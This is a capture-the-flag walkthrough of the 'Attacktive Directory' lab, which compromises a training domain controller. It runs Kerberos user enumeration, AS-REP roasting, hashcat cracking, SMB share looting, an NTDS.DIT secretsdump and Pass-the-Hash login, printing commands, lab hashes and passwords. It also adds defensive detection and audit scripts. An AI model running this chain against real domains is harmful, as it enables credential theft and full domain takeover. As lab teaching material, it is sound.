# Attacktive Directory

## Context

Our target is a **Domain Controller** (DC) with the IP address **10.10.209.6**. The challenge itself also gives us the domain.

{% hint style="info" %}
**Type:** Domain Controller (DC)

**IP:** 10.10.209.6

**Domain:** spookysec.local
{% endhint %}

## Reconnaissance

To start the reconnaissance, we can gather a good amount of information with the **Enum4linux** tool.

```
enum4linux 10.10.209.6
```

```
[...] 
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[...]
```

{% hint style="info" %}
**1.** *What tool will allow us to enumerate port 139/445?* **\[enum4linux]**
{% endhint %}

{% hint style="info" %}
**2.** *What is the NetBIOS-Domain Name of the machine?* **\[THM-AD]**
{% endhint %}

{% hint style="info" %}
**3.** *What invalid TLD do people commonly use for their Active Directory Domain?* **\[.LOCAL]**
{% endhint %}

### User enumeration

For the next task, we need to enumerate the domain's users with the **Kerbrute** tool (which is part of the **Impacket** set of Python classes), using the user and password wordlists provided by the challenge itself.

With the `-h` flag you can see the valid options needed to discover the users.

```
./kerbrute -h
```

Running the user enumeration:

```
./kerbrute userenum --dc 10.10.209.6 -d spookysec.local /usr/share/wordlists/attacktive-directory/userlist.txt
```

```
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/08/23 - Ronnie Flathers @ropnop

2023/01/08 18:26:19 >  Using KDC(s):
2023/01/08 18:26:19 >   10.10.209.6:88

2023/01/08 18:26:20 >  [+] VALID USERNAME:       james@spookysec.local
2023/01/08 18:26:26 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2023/01/08 18:26:39 >  [+] VALID USERNAME:       James@spookysec.local
2023/01/08 18:26:43 >  [+] VALID USERNAME:       robin@spookysec.local
2023/01/08 18:27:31 >  [+] VALID USERNAME:       darkstar@spookysec.local
2023/01/08 18:27:59 >  [+] VALID USERNAME:       administrator@spookysec.local
2023/01/08 18:29:23 >  [+] VALID USERNAME:       backup@spookysec.local
2023/01/08 18:30:03 >  [+] VALID USERNAME:       paradox@spookysec.local
2023/01/08 18:33:50 >  [+] VALID USERNAME:       JAMES@spookysec.local
2023/01/08 18:34:59 >  [+] VALID USERNAME:       Robin@spookysec.local
2023/01/08 18:43:09 >  [+] VALID USERNAME:       Administrator@spookysec.local

```

{% hint style="info" %}
**4.** *What command within Kerbrute will allow us to enumerate valid usernames?* **\[userenum]**
{% endhint %}

{% hint style="info" %}
**5.** *What notable account is discovered?* **\[svc-admin]**
{% endhint %}

{% hint style="info" %}
**6.** *What is the other notable account discovered?* **\[backup]**
{% endhint %}

## Exploitation

Now that we have several valid domain users, we can use a brute-force attack. In this case, we will use an attack called **ASREPRoasting**.

> An ASREPRoasting attack occurs when a user account has the "Does not require Pre-Authentication" privilege set. This means the account does not need to provide valid identification before requesting a Kerberos ticket for that user account.

For this type of attack we will use another class from the Impacket set, called **GetNPUsers**, which tells us which accounts present in the KDC (*Key Distribution Center*) are susceptible to ASREPRoasting. The only requirement to query the accounts is a valid set of users (which we already enumerated via Kerbrute).

```
python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile users2.txt -dc-ip 10.10.209.6 spookysec.local/
```

```
Impacket v0.10.1.dev1+20221214.172823.8799a1a2 - Copyright 2022 Fortra

[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:50822f1bbf7182827b71ddbcc8e8067a$81909570e086df06568c0ae7658e6bd2dd3e934c652adfd058f58b457e97a5767f78197a9c6fa1ac403df49eeeabd3582f3e007b2695b3c8829f3b02ee33e4f812768d19c710eb7ce550a15529a8e7b726ed4a6edc6583bb3093a94a7b553cc60e80b36c2954b37448682baf36227f2df69b133d854e29f1d025c27902971e95de3cc56335adc6d03ae14e2a031a98d5743d345226a46e52a78376da35609862b6d06f2d45cbfc9ceda36ae973e72c4de033b3e59301f4b5f3980acecc174281e4d0dc2d965b75ef06910057443d1e26111ad1b485a32555a1029d5521cfa0f3baddb8b386e1d445c2b472eb5ca5bbd3a3db
```

{% hint style="info" %}
**7.** *We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?* **\[svc-admin]**
{% endhint %}
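Both steps above leave a trace on the Domain Controller: the wordlist-driven user enumeration produces a burst of Kerberos TGT requests (Windows Security event 4768) for non-existent principals, and the AS-REP roast shows up as a successful 4768 with no pre-authentication and an RC4 session key. The following triage script is an added example, not part of the original writeup; it works on constructed event records keyed by the 4768 XML field names, and the alert threshold is an assumption.

```python
# Added example (not part of the original writeup): triage of Windows Security
# event 4768 (Kerberos TGT request) records for the two techniques shown above.
# Events are constructed dicts keyed by the 4768 XML field names.
from collections import defaultdict

ENUM_THRESHOLD = 5                    # assumed: distinct unknown names per client
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # 4768 Status for a name the KDC does not know
RC4_HMAC = "0x17"                     # TicketEncryptionType for etype 23

def find_user_enumeration(events, threshold=ENUM_THRESHOLD):
    """Return {client_ip: [unknown names]} for clients that asked for many
    non-existent principals, the pattern a wordlist-driven userenum leaves."""
    unknown = defaultdict(set)
    for ev in events:
        if ev["EventID"] == 4768 and ev["Status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown[ev["IpAddress"]].add(ev["TargetUserName"].lower())
    return {ip: sorted(n) for ip, n in unknown.items() if len(n) >= threshold}

def find_asrep_roast(events):
    """Return (account, client_ip) pairs that received a TGT with no
    pre-authentication (PreAuthType 0) and an RC4 key: exactly the material
    GetNPUsers printed above. Only DONT_REQUIRE_PREAUTH accounts can appear."""
    hits = set()
    for ev in events:
        if (ev["EventID"] == 4768 and ev["Status"] == "0x0"
                and ev["PreAuthType"] == "0"
                and ev["TicketEncryptionType"] == RC4_HMAC):
            hits.add((ev["TargetUserName"], ev["IpAddress"]))
    return sorted(hits)

def _ev(user, ip, status, preauth="2", etype="0x12"):
    # Constructed record; PreAuthType 2 = PA-ENC-TIMESTAMP, 0x12 = AES256
    return {"EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample: one client walks a wordlist, then roasts svc-admin.
SAMPLE_EVENTS = (
    [_ev(n, "10.10.14.7", "0x6") for n in ["aaron", "abby", "adam", "alice", "amy", "andy"]]
    + [_ev("james", "10.10.14.7", "0x0")]
    + [_ev("svc-admin", "10.10.14.7", "0x0", preauth="0", etype="0x17")]
    + [_ev("robin", "10.10.0.2", "0x0")]
)

if __name__ == "__main__":
    print(find_user_enumeration(SAMPLE_EVENTS))
    print(find_asrep_roast(SAMPLE_EVENTS))
```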

We found a valid user susceptible to ASREPRoasting. Now, to crack the hash with the password wordlist we saved earlier, we need to find out which type of hash we just obtained. For that, we can check the [**Hashcat**](https://hashcat.net/wiki/doku.php?id=example_hashes) list of example hashes.

Since there are many Kerberos 5 hash types in the Hashcat list, we must look carefully at the hash format to find out which mode to use to crack it.

<figure><img src="/files/q5oXDwqN3fhgyWVXyNmg" alt=""><figcaption><p>Hash type identified via <code>GetNPUsers.py</code></p></figcaption></figure>

{% hint style="info" %}
**8.** *Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC?* **\[Kerberos 5 AS-REP etype 23]**
{% endhint %}

{% hint style="info" %}
**9.** *What mode is the hash?* **\[18200]**
{% endhint %}
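The identification above can be done from the string itself: the `$krb5asrep$<etype>$<user>@<REALM>:<checksum>$<data>` layout carries the encryption type that selects the Hashcat mode. The parser below is an added example, not part of the original writeup; the sample hash is constructed with the writeup's principal and shortened hex fields, and only etype 23 is mapped to a mode.

```python
# Added example (not from the original writeup): identify a Kerberos 5 AS-REP
# hash in the Impacket/hashcat text format shown above and map it to the
# hashcat mode instead of eyeballing the example-hashes wiki.
import re

# $krb5asrep$<etype>$<user>@<REALM>:<checksum-hex>$<enc-data-hex>[:<password>]
# The optional ":<password>" suffix is what hashcat appends once a line is cracked.
_ASREP = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$:]+)@(?P<realm>[^:$]+)"
    r":(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)(?::(?P<password>.*))?$"
)
# etype 23 (RC4-HMAC) AS-REP is hashcat mode 18200; other etypes are not guessed here.
HASHCAT_MODES = {23: ("Kerberos 5, etype 23, AS-REP", 18200)}

def parse_asrep(line):
    m = _ASREP.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash")
    etype = int(m["etype"])
    if etype == 23 and len(m["checksum"]) != 32:
        # RC4-HMAC carries a 16-byte HMAC-MD5 checksum; anything else is a mangled line
        raise ValueError("etype 23 checksum must be 16 bytes (32 hex chars)")
    name, mode = HASHCAT_MODES.get(etype, (f"Kerberos 5, etype {etype}, AS-REP", None))
    return {"user": m["user"], "realm": m["realm"], "etype": etype,
            "hash_name": name, "hashcat_mode": mode,
            "edata_bytes": len(m["edata"]) // 2, "password": m["password"]}

def is_valid_asrep(line):
    """True when the line parses as a structurally sound AS-REP hash."""
    try:
        parse_asrep(line)
        return True
    except ValueError:
        return False

# Constructed sample: the writeup's principal with shortened hex fields.
SAMPLE = "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:" + "ab" * 16 + "$" + "cd" * 40
CRACKED = SAMPLE + ":management2005"

if __name__ == "__main__":
    for line in (SAMPLE, CRACKED):
        info = parse_asrep(line)
        print(info["user"], info["realm"], info["hashcat_mode"], info["password"])
```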

Now we can try to crack the hash with Hashcat.

```
hashcat -m 18200 hash.txt /usr/share/wordlists/attacktive-directory/passwordlist.txt
```

```
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:b6fa4c0ae56445ebc248205fe51a2258$399c4cadfb39280a56b80003cdfbf7cf8f73c667cc5fbabad698611853c9d0726ec290a23395c04a343df7a57ab99c36e02f972792b688d9787830a82e7f1505a545484c5c50289142a98449293f26bacc1a57dd691a8eb6c555bc9ccb5b2ef33b23da91128b51e26b1445555991b6d1dc0de7e732e6eed3658ef3c238272e9586f60aa36e58719e23228f205b800091ba9670f5ccb57d3d823143b334529ee1d75ab8946e585612df55b37bd7b94392e4efa64a1dacbac3e23c95862ca7981eaf4b6516b25526b63f93ae1930cf1c0c9aa49c975abff82557186018006edeaa5b7addd211a2c8e09f6a6a6bcf4ec4471f3c:management2005
```

{% hint style="info" %}
**10.** *Now crack the hash with the modified password list provided, what is the user accounts password?* **\[management2005]**
{% endhint %}

We have a valid credential. Using it, we now need to enumerate the server's shares with the classic **SMBClient** tool.

{% hint style="info" %}
**11.** *What utility can we use to map remote SMB shares?* **\[smbclient]**
{% endhint %}

Running the following command line, we can list the active shares:

```
smbclient -L \\\\10.10.209.6 -U spookysec.local/svc-admin
```

```
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
backup          Disk      
C$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share 
SYSVOL          Disk      Logon server share
```

{% hint style="info" %}
**12.** *Which option will list shares?* **\[-L]**
{% endhint %}

{% hint style="info" %}
**13.** *How many remote shares is the server listing?* **\[6]**
{% endhint %}

{% hint style="info" %}
**14.** *There is one particular share that we have access to that contains a text file. Which share is it?* **\[backup]**
{% endhint %}

Accessing the backup share with the credentials we found, we discover a file.

```
smb: \> ls
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3687835 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
```

```
$ cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
```

{% hint style="info" %}
**15.** *What is the content of the file?* **\[YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw]**
{% endhint %}

The file content looks like Base64. Decoding it from the Linux command line, we get the following result:

```
$ cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860
```

{% hint style="info" %}
**16.** *Decoding the contents of the file, what is the full contents?* **\[backup@spookysec.local:backup2517860]**
{% endhint %}

## Privilege Escalation

Now that we have access to the server, we can try to elevate our privileges. For that we will use the **secretsdump.py** tool, also part of the Impacket set. If we manage to collect hashes, we can try to elevate privileges using the **Pass the Hash** method.

```
python /opt/impacket/examples/secretsdump.py spookysec.local/backup:backup2517860@10.10.209.6
```

```
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:1ced74bb19b4fd8a6e0bf41ad102b86f:::
```

{% hint style="info" %}
**17.** *What method allowed us to dump NTDS.DIT?* **\[DRSUAPI]**
{% endhint %}

{% hint style="info" %}
**18.** *What is the Administrators NTLM hash?* **\[0e0363213e37b94221497260b0bcb4fc]**
{% endhint %}

{% hint style="info" %}
**19.** *What method of attack could allow us to authenticate as the user without the password?* **\[Pass the Hash]**
{% endhint %}
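The dump above also shows why Pass the Hash is so damaging here: Administrator and a-spooks carry the same NT hash, skidy and breakerofthings share one as well, and Guest still has the NT hash of the empty password. The audit script below is an added example, not part of the original writeup; it runs over a few lines copied from the dump above and reports hash reuse, empty passwords and stored LM hashes.

```python
# Added example (not from the original writeup): audit a secretsdump-style
# NTDS dump (user:rid:lmhash:nthash:::) for the weaknesses that make Pass the
# Hash so damaging: one NT hash shared by several accounts, accounts with an
# empty password, and LM hashes still stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string

def parse_ntds_line(line):
    """Split one dump line; returns (account, rid, lm, nt) or None for noise
    such as the '[*] Using the DRSUAPI method' banner or blank lines."""
    parts = line.strip().split(":")
    if len(parts) < 4 or not parts[1].isdigit():
        return None
    account = parts[0].split("\\")[-1]        # drop the 'spookysec.local\' prefix
    return account, int(parts[1]), parts[2].lower(), parts[3].lower()

def audit_ntds(lines):
    by_nt, empty_pw, lm_present = {}, [], []
    for line in lines:
        rec = parse_ntds_line(line)
        if rec is None:
            continue
        account, _rid, lm, nt = rec
        by_nt.setdefault(nt, []).append(account)
        if nt == EMPTY_NT:
            empty_pw.append(account)
        if lm != EMPTY_LM:                    # a real LM hash means LM storage is on
            lm_present.append(account)
    reused = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"reused": reused, "empty_password": empty_pw, "lm_present": lm_present}

# Sample lines copied from the dump above (only the accounts the findings need).
SAMPLE_DUMP = """
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
spookysec.local\\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
""".strip().splitlines()

if __name__ == "__main__":
    for finding, value in audit_ntds(SAMPLE_DUMP).items():
        print(finding, value)
```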

The twentieth flag apparently points us to the **Evil-WinRM** tool, which takes advantage of precisely the Pass the Hash weakness.

```
evil-winrm -i 10.10.209.6 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
```

{% hint style="info" %}
**20.** *Using a tool called Evil-WinRM what option will allow us to use a hash?* **\[-H]**
{% endhint %}

To complete the last part of the challenge, we just need to collect the text files in the Desktop folder of each indicated user. You can do that on your own. :)

